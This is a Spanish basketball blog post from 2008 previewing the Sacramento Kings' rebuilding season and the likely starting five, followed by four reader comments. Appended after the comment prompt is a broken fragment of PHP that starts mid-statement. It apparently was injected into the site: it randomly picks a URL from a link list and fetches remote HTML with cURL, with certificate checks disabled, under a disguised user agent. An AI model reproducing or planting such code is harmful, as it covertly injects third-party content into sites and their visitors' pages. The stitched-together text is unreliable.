Sacramento Kings: En modo reconstrucción

07 de October de 2008 por txusma

OLDTIMESEl 26 de Mayo de 2002 muchos aficionados de los Kings lloraron después de ver como un triple de Robert Horry les arrebataba en el último suspiro la tercera victoria consecutiva en las Finales de la Conferencia Oeste. Nunca sabremos si de haber fallado Horry ese triple, los Kings habrían acabado ganando la eliminatoria y más tarde el anillo de campeón, pero lo cierto es que aquélla fue la vez en la que aquel magnífico equipo liderado desde la banda por Rick Adelman estuvo más cerca de conseguirlo. A partir de ahí se inició una lenta decadencia que desembocó en la diáspora de sus principales estrellas: Divac abandonó la franquicia en el verano del 2004 rumbo L.A, Christie fue traspasado a Orlando en enero de 2005, tan solo unos días antes de que Webber marchara a Philadelphia. Un año después Predrag Stojakovic fue traspasado a los Indiana Pacers a cambio de Ron Artest y el traspaso de Mike Bibby, el último de Filipinas, a los Hawks a mediados de la pasada temporada ponía punto y final a la época más dorada de los Kings en Sacramento.

Este verano se ha pasado página del todo con el traspaso del sustituto de Stojakovic, Ron Artest. Después de una temporada en que los rumores le colocaban en Denver, Miami o New York, y un verano en el que un buen  día decidió renovar con los Kings y al día siguiente declaró que había sido el mayor error de su vida, finalmente fue traspaso a Houston a cambio del rookie Donte Greene, Bobby Jackson (que vuelve después de 4 años) y una primera ronda del 2009. Aparte de estos 2 jugadores tan solo se ha incorporado a la plantilla otro rookie: el PF Jason Thompson, que dejó muy buenas sensaciones en las ligas de verano, lo que conforma una plantilla muy parecida a la que terminó la temporada pasada. No podemos dejar de mencionar la retirada de todo un clásico como Shareef Abdur-Rahim tras una temporada plagada de lesiones.

De modo que el quinteto inicial para esta temporada no debería variar mucho respecto de la anterior. Tan solo la duda de quién ocupará el puesto de alero en lugar de Ron Artest intranquiliza a los analistas, y es que tanto John Salmons como Francisco García han cuajado buenas actuaciones en los momentos en que se necesitó su participación. Posiblemente Salmons, que la pasada temporada ya disputó 41 encuentros como titular sustituyendo principalmente a Kevin Martin sea finalmente el elegido, y García dispute cerca de 30 minutos por partido partiendo como sexto hombre. En todo caso son 2 jugadores muy similares que pueden aportar en diferentes facetas del juego en determinados momentos.

El resto del quinteto se presenta más definido: La estrella, sin ninguna duda, volverá a ser un Kevin Martin, que de superar sus problemas de lesiones del pasado año podría luchar por meterse en el All-Stars por primera vez en su carrera.  Beno Udrih, que tras pasar por el ostracismo de Popovich en S.A., firmó una gran temporada que le valió para conseguir un jugoso contrato (durante 5 años cobrará más de 6 millones por temporada) será el base del equipo. Se trata de un jugador muy válido que sabe dirigir el tempo del partido y con una buena visión de juego. En el juego interior encontramos la veteranía del equipo encarnada por Brad Miller, que a sus 32 años sigue siendo un gran reboteador e intimidador, y Mikki Moore, que a falta de nada mejor segurá siendo el ala-pívot del equipo.

En el banco, jugadores muy jóvenes como los ya mencionados Donte Greene y Jason Thompson (que no se despiste “Spaghetti” Moore), Spencer Hawes, que seguirá creciendo bajo la tutela de Brad Miller y sobre el que descansan muchas esperanzas, Shelden Williams, todo un número 5 del Draft del que aún se pueden esperar cosas interesantes o Quincy Douby, protagonista de actuaciones realmente espectaculares en algunos partidos del año pasado, junto con los más veteranos Bobby Jackson y Francisco García, forman un conjunto muy prometedor pero a priori poco consistente.

Reggie Theus no tiene entre sus jugadores grandes defensores por lo que deberá  jugar con clara mentalidad ofensiva, hecho que puede hacer dudar a más de uno de si madrugar para ver uno de sus partidos. El proyecto que tiene entre manos es muy interesante y de momento va viento en popa. No olvidemos que el año pasado con un Kevin Martin lesionado en bastante partidos, este grupo de jugadores consiguieron 38 victorias en el salvaje oeste, más de los muchos les pronosticaban. Este año, con sus jugadores con un año más de experiencia, sin el factor Artest (que aún no sabemos si suma o resta) y con las incorporaciones que han conseguido, deberían como mínimo realizar una campaña como la de la temporada pasada y seguir creciendo esperando su momento.

Quinteto: Beno Udrih, Kevin Martin, John Salmons, Mikki Moore y Brad Miller

Sexto Hombre: Francisco García

Pronóstico: Fuera de Playoffs

Comenta

4 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    El caso de este equipo es similar al de Indiana en el sentido de que el año pasado hicieron una temporada sorprendentemente meritoria y se vislumbro un cierto sentido positivo en la reconstrucción del equipo.
    Ahora, como Indiana, a pesar de lo bueno del año pasado se siguen viendo en tierra de nadie.

    El caso de Kings, sin embargo, la situación es mucho más chunga…
    El hecho de estar en el Oeste y el esperpento de Artest este verano que no se ha resuelto de forma demasiado satisfactoria para Sacramento les dejan sin ningún objetivo para esta temporada que no sea posicionarse para la lotería y continuar la reconstrucción que se prevee larga y dura.

      Citar

  2. MagicJohnson32 dice:
    #2

    Este año disfrutarán de la clase de Kevin Martin, rezarán para que Udrih siga progresando y que los rookies salgan bien. Y sólo les quedará dejar pasar el tiempo esperando a que se acaben algunos salarios que tienen por ahí… Para empezar el próximo verano acaban Bobby Jackson y Kenny Thomas, que son 14 kilazos.

      Citar

  3. Jabho dice:
    #3

    Yo tb pienso que es un equipo que estando en tierra de nadie y con Kevin Martin media campaña lesionado dejó sensaciones positivas.

    No estan para entrar en PO y menos en el Oeste, pero la idea será seguir jugando bien, ver progresar a algunos jugadores y aprovechar las oportunidades de mercado. Cuentan con expirings tanto este año como el que viene y Brad Miller podria ser un pieza de mucho valor en un equipo con aspiraciones (tipo Bulls por ejemplo) a cambio de liberar salario y algún que otro joven + rondas…

    Seguir creciendo este año y el siguiente para ser competitivos en el 2010

      Citar

  4. Viva_Dirk dice:
    #4

    Los dos rookies que han cogido me parecen muy buenos, a poco que les den bola le quitan el puesto a Moore seguro.

    El juego exterior que les queda es de gente con calidad y capacidad de sacrificio a la vez, Udrih, Martin, Garcia, Salmons y Douby son una rotación exterior de garantias, siempre hablando en terminos de ‘no-play-offs’. Si para cuando Brad Miller este demasiado mayor, los 4 jóvenes que tienen continuan en el equipo y han progresado los suficiente para que alguno de ellos tenga un nivel cercano al de Miller, tendrán mas facil atraer a un agente libre y terminar la reconstrucción, a parte de lo que les caiga en el futuro draft.

    Los interiores jóvenes que tienen son muy complementarios, el que menos cuenta en teoría es Williams….y les dio papas a los gallitos en la NCAA, es un jugador muy válido al que claramente le faltan minutos de juego Hawes es lo opuesto a Williams, clase y movimientos le sobran, como dice Txus es la gran esperanza de un nuevo ‘pivot blanco’ en Sacramento. Y de los de este año, Thompson es una bestia en el apartado físico, que unido a una buena capacidad tecnica le dejan casi comiendole terreno a Hawes. Donta Green es un jugadorazo, con todas las letras. De estos 4 podria salir un gran juego interior o la nada, yo me inclino mas por los primero que por lo segundo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>